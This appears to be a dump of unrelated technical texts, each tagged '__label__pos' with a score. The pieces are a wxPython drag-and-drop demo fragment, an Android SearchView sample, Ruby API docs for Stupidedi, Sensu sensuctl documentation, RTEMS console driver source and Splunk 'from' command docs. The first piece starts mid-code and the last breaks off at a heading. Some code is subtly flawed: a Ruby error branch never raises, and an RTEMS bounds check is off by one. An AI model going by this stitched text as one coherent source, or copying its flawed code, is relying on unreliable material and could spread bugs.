self, -1, "", style = wx.TE_MULTILINE|wx.HSCROLL|wx.TE_READONLY ) dt = MyTextDropTarget(self.text2, log) self.text2.SetDropTarget(dt) sizer.Add(self.text2, 1, wx.EXPAND) self.SetAutoLayout(True) self.SetSizer(sizer) def WriteText(self, text): self.text.WriteText(text) def SetInsertionPointEnd(self): self.text.SetInsertionPointEnd() #---------------------------------------------------------------------- #---------------------------------------------------------------------- class TestPanel(wx.Panel): def __init__(self, parent, log): wx.Panel.__init__(self, parent, -1) self.SetAutoLayout(True) outsideSizer = wx.BoxSizer(wx.VERTICAL) msg = "Clipboard / Drag-And-Drop" text = wx.StaticText(self, -1, "", style=wx.ALIGN_CENTRE) text.SetFont(wx.Font(24, wx.SWISS, wx.NORMAL, wx.BOLD, False)) text.SetLabel(msg) w,h = text.GetTextExtent(msg) text.SetSize(wx.Size(w,h+1)) text.SetForegroundColour(wx.BLUE) outsideSizer.Add(text, 0, wx.EXPAND|wx.ALL, 5) outsideSizer.Add(wx.StaticLine(self, -1), 0, wx.EXPAND) inSizer = wx.BoxSizer(wx.HORIZONTAL) inSizer.Add(ClipTextPanel(self, log), 1, wx.EXPAND) inSizer.Add(FileDropPanel(self, log), 1, wx.EXPAND) outsideSizer.Add(inSizer, 1, wx.EXPAND) self.SetSizer(outsideSizer) #---------------------------------------------------------------------- def runTest(frame, nb, log): win = TestPanel(nb, log) return win #---------------------------------------------------------------------- overview = """\ This demo shows some examples of data transfer through clipboard or drag and drop. In wxWindows, these two ways to transfer data (either between different applications or inside one and the same) are very similar which allows to implement both of them using almost the same code - or, in other words, if you implement drag and drop support for your application, you get clipboard support for free and vice versa. At the heart of both clipboard and drag and drop operations lies the wxDataObject class. The objects of this class (or, to be precise, classes derived from it) represent the data which is being carried by the mouse during drag and drop operation or copied to or pasted from the clipboard. wxDataObject is a "smart" piece of data because it knows which formats it supports (see GetFormatCount and GetAllFormats) and knows how to render itself in any of them (see GetDataHere). It can also receive its value from the outside in a format it supports if it implements the SetData method. Please see the documentation of this class for more details. Both clipboard and drag and drop operations have two sides: the source and target, the data provider and the data receiver. These which may be in the same application and even the same window when, for example, you drag some text from one position to another in a word processor. Let us describe what each of them should do. """ if __name__ == '__main__': import sys,os import run run.main(['', os.path.basename(sys.argv[0])] + sys.argv[1:])
__label__pos
0.944659
to top Android APIs   SearchViewActionBar.java ← Back The file containing the source code shown below is located in the corresponding directory in <sdk>/samples/android-<version>/... /* * Copyright (C) 2010 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.example.android.apis.view; import com.example.android.apis.R; import android.app.Activity; import android.app.SearchManager; import android.app.SearchableInfo; import android.content.Context; import android.os.Bundle; import android.view.Menu; import android.view.MenuInflater; import android.view.MenuItem; import android.view.View; import android.view.Window; import android.view.MenuItem.OnActionExpandListener; import android.widget.Button; import android.widget.SearchView; import android.widget.TextView; import java.util.List; /** * This demonstrates the usage of SearchView in an ActionBar as a menu item. * It sets a SearchableInfo on the SearchView for suggestions and submitting queries to. */ public class SearchViewActionBar extends Activity implements SearchView.OnQueryTextListener { private SearchView mSearchView; private TextView mStatusView; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); getWindow().requestFeature(Window.FEATURE_ACTION_BAR); setContentView(R.layout.searchview_actionbar); mStatusView = (TextView) findViewById(R.id.status_text); } @Override public boolean onCreateOptionsMenu(Menu menu) { super.onCreateOptionsMenu(menu); MenuInflater inflater = getMenuInflater(); inflater.inflate(R.menu.searchview_in_menu, menu); MenuItem searchItem = menu.findItem(R.id.action_search); mSearchView = (SearchView) searchItem.getActionView(); setupSearchView(searchItem); return true; } private void setupSearchView(MenuItem searchItem) { if (isAlwaysExpanded()) { mSearchView.setIconifiedByDefault(false); } else { searchItem.setShowAsActionFlags(MenuItem.SHOW_AS_ACTION_IF_ROOM | MenuItem.SHOW_AS_ACTION_COLLAPSE_ACTION_VIEW); } SearchManager searchManager = (SearchManager) getSystemService(Context.SEARCH_SERVICE); if (searchManager != null) { List<SearchableInfo> searchables = searchManager.getSearchablesInGlobalSearch(); // Try to use the "applications" global search provider SearchableInfo info = searchManager.getSearchableInfo(getComponentName()); for (SearchableInfo inf : searchables) { if (inf.getSuggestAuthority() != null && inf.getSuggestAuthority().startsWith("applications")) { info = inf; } } mSearchView.setSearchableInfo(info); } mSearchView.setOnQueryTextListener(this); } public boolean onQueryTextChange(String newText) { mStatusView.setText("Query = " + newText); return false; } public boolean onQueryTextSubmit(String query) { mStatusView.setText("Query = " + query + " : submitted"); return false; } public boolean onClose() { mStatusView.setText("Closed!"); return false; } protected boolean isAlwaysExpanded() { return false; } }
__label__pos
0.527547
Class: Stupidedi::Schema::LoopDef Inherits: AbstractDef show all Includes: Inspect Defined in: lib/stupidedi/schema/loop_def.rb Overview See Also: • 2.2.2 Loops • B.1.3.12.4 Loops of Data Segments Instance Attribute Summary collapse Constructors collapse Instance Method Summary collapse Methods included from Inspect #inspect Methods inherited from AbstractDef #component?, #composite?, #definition?, #element?, #functional_group?, #interchange?, #repeated?, #segment?, #simple?, #table?, #transaction_set?, #usage? Constructor Details #initialize(id, repeat_count, header_segment_uses, loop_defs, trailer_segment_uses, parent) ⇒ LoopDef Returns a new instance of LoopDef 37 38 39 40 41 42 43 44 45 46 47 48 # File 'lib/stupidedi/schema/loop_def.rb', line 37 def initialize(id, repeat_count, header_segment_uses, loop_defs, trailer_segment_uses, parent) @id, @repeat_count, @header_segment_uses, @loop_defs, @trailer_segment_uses, @parent = id, repeat_count, header_segment_uses, loop_defs, trailer_segment_uses, parent # Delay re-parenting until the entire definition tree has a root # to prevent unnecessarily copying objects unless parent.nil? @header_segment_uses = @header_segment_uses.map{|x| x.copy(:parent => self) } @loop_defs = @loop_defs.map{|x| x.copy(:parent => self) } @trailer_segment_uses = @trailer_segment_uses.map{|x| x.copy(:parent => self) } end end Instance Attribute Details #header_segment_usesArray<SegmentUse> (readonly) Returns: 22 23 24 # File 'lib/stupidedi/schema/loop_def.rb', line 22 def header_segment_uses @header_segment_uses end #idString (readonly) Returns: • (String) 16 17 18 # File 'lib/stupidedi/schema/loop_def.rb', line 16 def id @id end #loop_defsArray<LoopDef> (readonly) Returns: 28 29 30 # File 'lib/stupidedi/schema/loop_def.rb', line 28 def loop_defs @loop_defs end #parentLoopDef, TableDef (readonly) Returns: 31 32 33 # File 'lib/stupidedi/schema/loop_def.rb', line 31 def parent @parent end #repeat_countRepeatCount (readonly) Returns: 19 20 21 # File 'lib/stupidedi/schema/loop_def.rb', line 19 def repeat_count @repeat_count end #trailer_segment_usesArray<SegmentUse> (readonly) Returns: 25 26 27 # File 'lib/stupidedi/schema/loop_def.rb', line 25 def trailer_segment_uses @trailer_segment_uses end Class Method Details .build(id, repeat_count, *children) ⇒ LoopDef Returns: 136 137 138 139 140 141 142 143 144 145 146 147 148 149 # File 'lib/stupidedi/schema/loop_def.rb', line 136 def build(id, repeat_count, *children) header, children = children.split_when{|x| x.is_a?(LoopDef) } loop_defs, trailer = children.split_when{|x| x.is_a?(SegmentUse) } # @todo: Ensure there is at least one SegmentUse in header if header.empty? raise Exceptions::InvalidSchemaError, "first child must be a SegmentUse" elsif header.head.repeat_count.include?(2) "first child must have RepeatCount.bounded(1)" end new(id, repeat_count, header, loop_defs, trailer, nil) end Instance Method Details #bounded?Boolean Returns: • (Boolean) See Also: • B.1.1.3.11.1 Loop Control Segments • B.1.1.3.12.4 Loops of Data Segments Bounded Loops 67 68 69 70 # File 'lib/stupidedi/schema/loop_def.rb', line 67 def bounded? @header_segment_uses.head.definition.id == :LS and @trailer_segment_uses.last.definition.id == :LE end #childrenArray<SegmentUse, LoopDef> Returns: 83 84 85 # File 'lib/stupidedi/schema/loop_def.rb', line 83 def children @header_segment_uses + @loop_defs + @trailer_segment_uses end #code_listsAbstractSet<CodeList> Returns: 97 98 99 # File 'lib/stupidedi/schema/loop_def.rb', line 97 def code_lists children.map(&:code_lists).inject(&:|) end #copy(changes = {}) ⇒ LoopDef Returns: 51 52 53 54 55 56 57 58 59 # File 'lib/stupidedi/schema/loop_def.rb', line 51 def copy(changes = {}) LoopDef.new \ changes.fetch(:id, @id), changes.fetch(:repeat_count, @repeat_count), changes.fetch(:header_segment_uses, @header_segment_uses), changes.fetch(:loop_defs, @loop_defs), changes.fetch(:trailer_segment_uses, @trailer_segment_uses), changes.fetch(:parent, @parent) end #emptyLoopVal Returns: • (LoopVal) 88 89 90 # File 'lib/stupidedi/schema/loop_def.rb', line 88 def empty Values::LoopVal.new(self, []) end #entry_segment_useSegmentUse Returns: 78 79 80 # File 'lib/stupidedi/schema/loop_def.rb', line 78 def entry_segment_use @header_segment_uses.head end #hierarchical?Boolean Returns: • (Boolean) See Also: • 5.6 HL-initiated Loop 73 74 75 # File 'lib/stupidedi/schema/loop_def.rb', line 73 def hierarchical? @header_segment_uses.head.definition.id == :HL end #loop?Boolean Returns: • (Boolean) 92 93 94 # File 'lib/stupidedi/schema/loop_def.rb', line 92 def loop? true end #pretty_print(q) This method returns an undefined value. 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 # File 'lib/stupidedi/schema/loop_def.rb', line 102 def pretty_print(q) q.text("LoopDef[#{@id}]") q.group(2, "(", ")") do q.breakable "" @header_segment_uses.each do |e| unless q.current_group.first? q.text "," q.breakable end q.pp e end @loop_defs.each do |e| unless q.current_group.first? q.text "," q.breakable end q.pp e end @trailer_segment_uses.each do |e| unless q.current_group.first? q.text "," q.breakable end q.pp e end end end #repeatable?Boolean Returns: • (Boolean) 61 62 63 # File 'lib/stupidedi/schema/loop_def.rb', line 61 def repeatable? @repeat_count.try{|r| r.include?(2) } end
__label__pos
0.896994
Sensuctl Sensuctl is a command line tool for managing resources within Sensu. It works by calling Sensu’s underlying API to create, read, update, and delete resources, events, and entities. Sensuctl is available for Linux, macOS, and Windows. See the installation guide to install and configure sensuctl. Getting help Sensuctl supports a --help flag for each command and subcommand. # See command and global flags sensuctl --help # See subcommands and flags sensuctl check --help # See usage and flags sensuctl check delete --help First-time setup To set up sensuctl, run sensuctl configure to log in to sensuctl and connect to the Sensu backend. sensuctl configure When prompted, input the Sensu backend URL and your Sensu access credentials. ? Sensu Backend URL: http://127.0.0.1:8080 ? Username: admin ? Password: P@ssw0rd! ? Namespace: default ? Preferred output format: tabular Sensu backend URL The HTTP or HTTPS URL where sensuctl can connect to the Sensu backend server, defaulting to http://127.0.0.1:8080. When connecting to a Sensu cluster, connect sensuctl to any single backend in the cluster. For more information on configuring the Sensu backend URL, see the backend reference. Username | password | namespace By default, Sensu includes a user named admin with password P@ssw0rd! and a default namespace. Your ability to get, list, create, update, and delete resources with sensuctl depends on the permissions assigned to your Sensu user. For more information about configuring Sensu access control, see the RBAC reference. Preferred output format Sensuctl supports the following output formats: Once logged in, you can change the output format using sensuctl config set-format or set it per command using the --format flag. Managing sensuctl The sencutl config command lets you view the current sensuctl configuration and set the namespace and output format. View sensuctl config To view the active configuration for sensuctl: sensuctl config view Sensuctl configuration includes the Sensu backend url, Sensu edition (Core or Enterprise), the default output format for the current user, and the default namespace for the current user. api-url: http://127.0.0.1:8080 edition: core format: wrapped-json namespace: default Set output format You can use the set-format command to change the default output format for the current user. For example, to change the output format to tabular: sensuctl config set-format tabular Set namespace You can use the set-namespace command to change the default namespace for the current user. For more information about configuring Sensu access control, see the RBAC reference. For example, to change the default namespace to development: sensuctl config set-namespace development Log out of sensuctl To log out of sensuctl: sensuctl logout To log back in: sensuctl configure View the sensuctl version number To display the current version of sensuctl: sensuctl version Global flags Global flags modify settings specific to sensuctl, such as the Sensu backend URL and namespace. You can use global flags with most sensuctl commands. --api-url string host URL of Sensu installation --cache-dir string path to directory containing cache & temporary files --config-dir string path to directory containing configuration files --namespace string namespace in which we perform actions (default: "default") Creating resources The sensuctl create command allows you to create or update resources by reading from STDIN or a flag configured file (-f). The create command accepts Sensu resource definitions in wrapped-json and yaml. Both JSON and YAML resource definitions wrap the contents of the resource in spec and identify the resource type (see below for an example, and this table for a list of supported types). See the reference docs for information about creating resource definitions. For example, the following file my-resources.json specifies two resources: a marketing-site check and a slack handler. { "type": "CheckConfig", "spec": { "command": "check-http.go -u https://dean-learner.book", "subscriptions": ["demo"], "interval": 15, "handlers": ["slack"], "metadata" : { "name": "marketing-site", "namespace": "default" } } } { "type": "Handler", "api_version": "core/v2", "metadata": { "name": "slack", "namespace": "default" }, "spec": { "command": "sensu-slack-handler --channel '#monitoring'", "env_vars": [ "SLACK_WEBHOOK_URL=https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX" ], "filters": [ "is_incident", "not_silenced" ], "handlers": [], "runtime_assets": [], "timeout": 0, "type": "pipe" } } NOTE: Commas cannot be included between JSON resource definitions when using sensuctl create. To create all resources from my-resources.json using sensuctl create: sensuctl create --file my-resources.json Or: cat my-resources.json | sensuctl create sensuctl create resource types sensuctl create types AdhocRequest adhoc_request Asset asset CheckConfig check_config ClusterRole cluster_role ClusterRoleBinding cluster_role_binding Entity entity Event event EventFilter event_filter Handler handler Hook hook HookConfig hook_config Mutator mutator Namespace namespace Role role RoleBinding role_binding Silenced silenced Updating resources Sensuctl allows you to update resource definitions using a text editor. To use sensuctl edit, specify the resource type and resource name. For example, to edit a handler named slack using sensuctl edit: sensuctl edit handler slack sensuctl edit resource types sensuctl edit types asset check cluster cluster-role cluster-role-binding entity event filter handler hook mutator namespace role role-binding silenced user Managing resources Sensuctl provides the following commands to manage Sensu resources. Subcommands Sensuctl provides a standard set of list, info, and delete operations for most resource types. list list resources info NAME show detailed resource information given resource name delete NAME delete resource given resource name For example, to list all monitoring checks: sensuctl check list To write all checks to my-resources.json in wrapped-json format: sensuctl check list --format wrapped-json > my-resources.json To see the definition for a check named check-cpu in wrapped-json format: sensuctl check info check-cpu --format wrapped-json In addition to the standard operations, commands may support subcommands or flags that allow you to take special action based on the resource type; the following sections call out those resource-specific operations. For a list of subcommands specific to a resource, run sensuctl TYPE --help. sensuctl check In addition to the standard subcommands, sensuctl provides a command to execute a check on demand, given the check name. sensuctl check execute NAME For example, the following command executes the check-cpu check with an attached message: sensuctl check execute check-cpu --reason "giving a sensuctl demo" You can also use the --subscriptions flag to override the subscriptions in the check definition: sensuctl check execute check-cpu --subscriptions demo,webserver sensuctl cluster The sensuctl cluster command lets you manage a Sensu cluster using the following subcommands. health get sensu health status member-add add cluster member to an existing cluster, with comma-separated peer addresses member-list list cluster members member-remove remove cluster member by ID member-update update cluster member by ID with comma-separated peer addresses To view cluster members: sensuctl cluster member-list To see the health of your Sensu cluster: sensuctl cluster health sensuctl event In addition to the standard subcommands, sensuctl provides a command to resolve an event. sensuctl event resolve ENTITY CHECK For example, the following command manually resolves an event created by the entity webserver1 and the check check-http: sensuctl event resolve webserver1 check-http sensuctl namespace See the RBAC reference for information about using access control with namespaces. sensuctl user See the RBAC reference for information about local user management with sensuctl. Time formats Sensuctl supports multiple time formats depending on the manipulated resource. Supported canonical time zone IDs are defined in the tz database. WARNING: Canonical zone IDs (i.e. America/Vancouver) are not supported on Windows. Dates with time Full dates with time are used to specify an exact point in time, which can be used with silencing entries, for example. The following formats are supported: • RFC3339 with numeric zone offset: 2018-05-10T07:04:00-08:00 or 2018-05-10T15:04:00Z • RFC3339 with space delimiters and numeric zone offset: 2018-05-10 07:04:00 -08:00 • Sensu alpha legacy format with canonical zone ID: May 10 2018 7:04AM America/Vancouver Shell auto-completion Installation (Bash Shell) Make sure bash completion is installed. If you use a current Linux in a non-minimal installation, bash completion should be available. On macOS, install with: brew install bash-completion Then add the following to your ~/.bash_profile: if [ -f $(brew --prefix)/etc/bash_completion ]; then . $(brew --prefix)/etc/bash_completion fi Once bash-completion is available, add the following to your ~/.bash_profile: source <(sensuctl completion bash) You can now source your ~/.bash_profile or launch a new terminal to utilize completion. source ~/.bash_profile Installation (ZSH) Add the following to your ~/.zshrc: source <(sensuctl completion zsh) You can now source your ~/.zshrc or launch a new terminal to utilize completion. source ~/.zshrc Usage sensuctl Tab check configure event user asset completion entity handler sensuctl check Tab create delete import list Configuration files During configuration, sensuctl creates configuration files that contain information for connecting to your Sensu Go deployment. You can find them at $HOME/.config/sensu/sensuctl/profile and $HOME/.config/sensu/sensuctl/profile. For example: cat .config/sensu/sensuctl/profile { "format": "tabular", "namespace": "demo" } cat .config/sensu/sensuctl/cluster { "api-url": "http://localhost:8080", "trusted-ca-file": "", "insecure-skip-tls-verify": false, "access_token": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", "expires_at": 1550082282, "refresh_token": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" } These are useful if you want to know what cluster you’re connecting to, or what namespace you’re currently configured to use.
__label__pos
0.646305
source: rtems/c/src/lib/libbsp/shared/console.c @ 1c6926c1 Last change on this file since 1c6926c1 was 1c6926c1, checked in by Kevin Kirspel <kevin-kirspel@…>, on Mar 21, 2017 at 7:39:48 PM termios: Synchronize with latest FreeBSD headers Adding modified FreeBSD headers to synchronize RTEMS termios with FreeBSD. Modify termios to support dedicated input and output baud for termios structure. Updated BSPs to use dedicated input and output baud in termios structure. Updated tools to use dedicated input and output baud in termios structure. Updated termios testsuites to use dedicated input and output baud in termios structure. Close #2897. • Property mode set to 100644 File size: 9.6 KB Line  1/** 2 * @file 3 * 4 * @ingroup Console 5 * 6 * @brief Extension of the generic libchip console driver shell 7 */ 8 9/* 10 *  COPYRIGHT (c) 1989-2011, 2016. 11 *  On-Line Applications Research Corporation (OAR). 12 * 13 *  The license and distribution terms for this file may be 14 *  found in the file LICENSE in this distribution or at 15 *  http://www.rtems.org/license/LICENSE. 16 */ 17 18#include <bsp.h> 19#include <bsp/fatal.h> 20#include <rtems/libio.h> 21#include <rtems/console.h> 22#include <stdlib.h> 23#include <assert.h> 24#include <termios.h> 25 26#include <rtems/termiostypes.h> 27#include <libchip/serial.h> 28#include "console_private.h" 29 30unsigned long               Console_Port_Count  = 0; 31console_tbl               **Console_Port_Tbl    = NULL; 32console_data               *Console_Port_Data   = NULL; 33rtems_device_minor_number   Console_Port_Minor  = 0; 34static bool                 console_initialized = false; 35 36/* 37 *  console_find_console_entry 38 * 39 *  This method is used to search the console entries for a 40 *  specific device entry. 41 */ 42console_tbl* console_find_console_entry( 43  const char                *match, 44  size_t                     length, 45  rtems_device_minor_number *match_minor 46) 47{ 48  rtems_device_minor_number  minor; 49 50  /* 51   * The the match name is NULL get the minor number entry. 52   */ 53  if (match == NULL) { 54    if (*match_minor < Console_Port_Count) 55      return Console_Port_Tbl[*match_minor]; 56    return NULL; 57  } 58 59  for (minor=0; minor < Console_Port_Count ; minor++) { 60    console_tbl  *cptr = Console_Port_Tbl[minor]; 61 62    /* 63     * Console table entries include /dev/ prefix, device names passed 64     * in on command line do not. 65     */ 66    if ( !strncmp( cptr->sDeviceName, match, length ) ) { 67      *match_minor = minor; 68      return cptr; 69    } 70  } 71 72  return NULL; 73} 74 75/* 76 *  console_initialize_data 77 * 78 *  This method is used to initialize the table of pointers to the 79 *  serial port configuration structure entries. 80 */ 81void console_initialize_data(void) 82{ 83  int i; 84 85  if ( Console_Port_Tbl ) 86    return; 87 88  /* 89   * Allocate memory for the table of device pointers. 90   */ 91  Console_Port_Count = Console_Configuration_Count; 92  Console_Port_Tbl   = malloc( Console_Port_Count * sizeof( console_tbl * ) ); 93  if (Console_Port_Tbl == NULL) 94    bsp_fatal( BSP_FATAL_CONSOLE_NO_MEMORY_0 ); 95 96  /* 97   * Allocate memory for the table of device specific data pointers. 98   */ 99  Console_Port_Data  = calloc( Console_Port_Count, sizeof( console_data ) ); 100  if ( Console_Port_Data == NULL ) { 101    bsp_fatal( BSP_FATAL_CONSOLE_NO_MEMORY_3 ); 102  } 103 104  /* 105   * Fill in the Console Table 106   */ 107  for (i=0 ; i < Console_Port_Count ; i++) { 108    Console_Port_Tbl[i] = &Console_Configuration_Ports[i]; 109  } 110} 111 112/* 113 *  console_register_devices 114 * 115 *  This method is used to add dynamically discovered devices to the 116 *  set of serial ports supported. 117 */ 118void console_register_devices( 119  console_tbl *new_ports, 120  size_t       number_of_ports 121) 122{ 123  int  old_number_of_ports; 124  int  i; 125 126  /* 127   * Initialize the console data elements 128   */ 129  console_initialize_data(); 130 131  /* 132   *  console_initialize() has been invoked so it is now too late to 133   *  register devices. 134   */ 135  if ( console_initialized ) { 136    bsp_fatal( BSP_FATAL_CONSOLE_MULTI_INIT ); 137  } 138 139  /* 140   *  Allocate memory for the console port extension 141   */ 142  old_number_of_ports = Console_Port_Count; 143  Console_Port_Count += number_of_ports; 144  Console_Port_Tbl = realloc( 145    Console_Port_Tbl, 146    Console_Port_Count * sizeof(console_tbl *) 147  ); 148  if ( Console_Port_Tbl == NULL ) { 149    bsp_fatal( BSP_FATAL_CONSOLE_NO_MEMORY_1 ); 150  } 151 152  /* 153   * Since we can only add devices before console_initialize(), 154   * the data area will contain no information and must be zero 155   * before it is used. So extend the area and zero it out. 156   */ 157  Console_Port_Data = realloc( 158    Console_Port_Data, 159    Console_Port_Count * sizeof(console_data) 160  ); 161  if ( Console_Port_Data == NULL ) { 162    bsp_fatal( BSP_FATAL_CONSOLE_NO_MEMORY_2 ); 163  } 164  memset(Console_Port_Data, '\0', Console_Port_Count * sizeof(console_data)); 165 166  /* 167   *  Now add the new devices at the end. 168   */ 169  for (i=0 ; i < number_of_ports ; i++) { 170    Console_Port_Tbl[old_number_of_ports + i]  = &new_ports[i]; 171  } 172} 173 174/* 175 *  console_open 176 * 177 *  open a port as a termios console. 178 */ 179rtems_device_driver console_open( 180  rtems_device_major_number major, 181  rtems_device_minor_number minor, 182  void                    * arg 183) 184{ 185  rtems_status_code              status; 186  rtems_libio_open_close_args_t *args = arg; 187  rtems_libio_ioctl_args_t       IoctlArgs; 188  struct termios                 Termios; 189  rtems_termios_callbacks        Callbacks; 190  console_tbl                   *cptr; 191  struct rtems_termios_tty      *current_tty; 192 193  /* 194   * Verify the port number is valid. 195   */ 196  if ( minor > Console_Port_Count ) { 197    return RTEMS_INVALID_NUMBER; 198  } 199 200  /* 201   * Open the port as a termios console driver. 202   */ 203 204  cptr = Console_Port_Tbl[minor]; 205  Callbacks.firstOpen            = cptr->pDeviceFns->deviceFirstOpen; 206  Callbacks.lastClose            = cptr->pDeviceFns->deviceLastClose; 207  Callbacks.pollRead             = cptr->pDeviceFns->deviceRead; 208  Callbacks.write                = cptr->pDeviceFns->deviceWrite; 209  Callbacks.setAttributes        = cptr->pDeviceFns->deviceSetAttributes; 210  if (cptr->pDeviceFlow != NULL) { 211    Callbacks.stopRemoteTx  = cptr->pDeviceFlow->deviceStopRemoteTx; 212    Callbacks.startRemoteTx = cptr->pDeviceFlow->deviceStartRemoteTx; 213  } else { 214    Callbacks.stopRemoteTx  = NULL; 215    Callbacks.startRemoteTx = NULL; 216  } 217  Callbacks.outputUsesInterrupts = cptr->pDeviceFns->deviceOutputUsesInterrupts; 218 219  /* XXX what about 220   *        Console_Port_Tbl[minor].ulMargin, 221   *        Console_Port_Tbl[minor].ulHysteresis); 222   */ 223 224  status = rtems_termios_open( major, minor, arg, &Callbacks ); 225  Console_Port_Data[minor].termios_data = args->iop->data1; 226 227  /* Get tty pointur from the Console_Port_Data */ 228  current_tty = Console_Port_Data[minor].termios_data; 229 230  if ( (current_tty->refcount == 1) ) { 231 232    /* 233     *  If this BSP has a preferred default rate, then use that. 234     */ 235    #if defined(BSP_DEFAULT_BAUD_RATE) 236      rtems_termios_set_initial_baud( current_tty, BSP_DEFAULT_BAUD_RATE ); 237    #endif 238 239    /* 240     * If it's the first open, modified, if need, the port parameters 241     */ 242    if ( minor != Console_Port_Minor ) { 243      /* 244       * If this is not the console we do not want ECHO and so forth 245       */ 246      IoctlArgs.iop     = args->iop; 247      IoctlArgs.command = TIOCGETA; 248      IoctlArgs.buffer  = &Termios; 249      rtems_termios_ioctl( &IoctlArgs ); 250 251      Termios.c_lflag   = ICANON; 252      IoctlArgs.command = TIOCSETA; 253      rtems_termios_ioctl( &IoctlArgs ); 254    } 255  } 256 257  if ( (args->iop->flags&LIBIO_FLAGS_READ) && 258      cptr->pDeviceFlow && 259      cptr->pDeviceFlow->deviceStartRemoteTx) { 260    cptr->pDeviceFlow->deviceStartRemoteTx(minor); 261  } 262 263  return status; 264} 265 266/* 267 *  console_close 268 * 269 *  This routine closes a port that has been opened as console. 270 */ 271rtems_device_driver console_close( 272  rtems_device_major_number major, 273  rtems_device_minor_number minor, 274  void                    * arg 275) 276{ 277  rtems_libio_open_close_args_t *args = arg; 278  struct rtems_termios_tty      *current_tty; 279  console_tbl                   *cptr; 280 281  cptr  = Console_Port_Tbl[minor]; 282 283  /* Get tty pointer from the Console_Port_Data */ 284  current_tty = Console_Port_Data[minor].termios_data; 285 286  /* Get the tty refcount to determine if we need to do deviceStopRemoteTx. 287   * Stop only if it's the last one opened. 288   */ 289  if ( (current_tty->refcount == 1) ) { 290    if ( (args->iop->flags&LIBIO_FLAGS_READ) && 291          cptr->pDeviceFlow && 292          cptr->pDeviceFlow->deviceStopRemoteTx) { 293      cptr->pDeviceFlow->deviceStopRemoteTx(minor); 294    } 295  } 296 297  return rtems_termios_close (arg); 298} 299 300/* 301 *  console_initialize 302 * 303 *  Routine called to initialize the console device driver. 304 */ 305rtems_device_driver console_initialize( 306  rtems_device_major_number  major, 307  rtems_device_minor_number  minor_arg, 308  void                      *arg 309) 310{ 311  rtems_status_code          status; 312  rtems_device_minor_number  minor; 313  console_tbl               *port; 314 315  /* 316   * If we have no devices which were registered earlier then we 317   * must still initialize pointers for Console_Port_Tbl and 318   * Console_Port_Data. 319   */ 320  console_initialize_data(); 321 322  /* 323   *  console_initialize has been invoked so it is now too late to 324   *  register devices. 325   */ 326  console_initialized = true; 327 328  /* 329   *  Initialize the termio interface, our table of pointers to device 330   *  information structures, and determine if the user has explicitly 331   *  specified which device is to be used for the console. 332   */ 333  rtems_termios_initialize(); 334  bsp_console_select(); 335 336  /* 337   *  Iterate over all of the console devices we know about 338   *  and initialize them. 339   */ 340  for (minor=0 ; minor < Console_Port_Count ; minor++) { 341    /* 342     *  First perform the configuration dependent probe, then the 343     *  device dependent probe 344     */ 345    port = Console_Port_Tbl[minor]; 346 347    if ( (!port->deviceProbe || port->deviceProbe(minor)) && 348         port->pDeviceFns->deviceProbe(minor)) { 349 350      if (port->sDeviceName != NULL) { 351        status = rtems_io_register_name( port->sDeviceName, major, minor ); 352        if (status != RTEMS_SUCCESSFUL) { 353          bsp_fatal( BSP_FATAL_CONSOLE_REGISTER_DEV_0 ); 354        } 355      } 356 357      if (minor == Console_Port_Minor) { 358        status = rtems_io_register_name( CONSOLE_DEVICE_NAME, major, minor ); 359        if (status != RTEMS_SUCCESSFUL) { 360          bsp_fatal( BSP_FATAL_CONSOLE_REGISTER_DEV_1 ); 361        } 362      } 363 364      /* 365       * Initialize the hardware device. 366       */ 367      port->pDeviceFns->deviceInitialize(minor); 368 369    } 370  } 371 372  return RTEMS_SUCCESSFUL; 373} Note: See TracBrowser for help on using the repository browser.
__label__pos
0.999089
Splunk® Enterprise Search Reference Download manual as PDF Download topic as PDF from Description The from command retrieves data from a dataset, such as a data model dataset, a CSV lookup, a KV Store lookup, a saved search, or a table dataset. Design a search that uses the from command to reference a dataset. Optionally add additional SPL such as lookups, eval expressions, and transforming commands to the search Save the result as a report, alert, or dashboard panel. If you use Splunk Cloud, or use Splunk Enterprise and have installed the Splunk Datasets Add-on, you can also save the search as a table dataset. See the Usage section. Syntax | from <dataset_type>:<dataset_name> Required arguments <dataset_type> Syntax: <dataset_type> Description: The type of dataset. Valid values are: datamodel, inputlookup, and savedsearch. The datamodel dataset type can be either a data model dataset or a table dataset. You create data model datasets with the Data Model Editor. You can create table datasets with the Table Editor if you use Splunk Cloud or use Splunk Enterprise and have installed the Splunk Datasets Add-on. The inputlookup dataset type can be either a CSV lookup or a KV Store lookup. The savedsearch dataset type is a saved search. You can use from to reference any saved search as a dataset. See About datasets in the Knowledge Manager Manual. <dataset_name> Syntax: <dataset_name> Description: The name of the dataset that you want to retrieve data from. If the dataset_type is a data model, the syntax is <datamodel_name>.<dataset_name>. If the name of the dataset contains spaces, enclose the dataset name in quotation marks. Example: If the data model name is internal_server, and the dataset name is splunkdaccess, specify internal_server.splunkdaccess for the dataset_name. In older versions of the Splunk software, the term "data model object" was used. That term has been replaced with "data model dataset". Optional arguments None. Usage When you use the from command, you must reference an existing dataset. You can reference any dataset listed in the Datasets listing page (data model datasets, CSV lookup files, CSV lookup definitions, and table datasets). You can also reference saved searches and KV Store lookup definitions. See View and manage datasets in the Knowledge Manager Manual. When you create a report, alert, dashboard panel, or table dataset that is based on a from search that references a dataset, that knowledge object has a dependency on the referenced dataset. This is dataset extension. When you make a change to the original dataset, such as removing or adding fields, that change propagates down to the reports, alerts, dashboard panels, and tables that have been extended from that original dataset. See Dataset extension in the Knowledge Manager Manual. The from command is a generating command, and should be the first command in the search. Generating commands use a leading pipe character. However, you can use the from command inside the append command. Examples 1. Search a data model Search a data model that contains internal server log events for REST API calls. In this example, internal_server is the data model name and splunkdaccess is the dataset inside the internal_server data model. | from datamodel:internal_server.splunkdaccess 2. Search a lookup file Search a lookup file that contains geographic attributes for each country, such as continent, two-letter ISO code, and subregion. | from inputlookup:geo_attr_countries.csv 3. Retrieve data by using a lookup 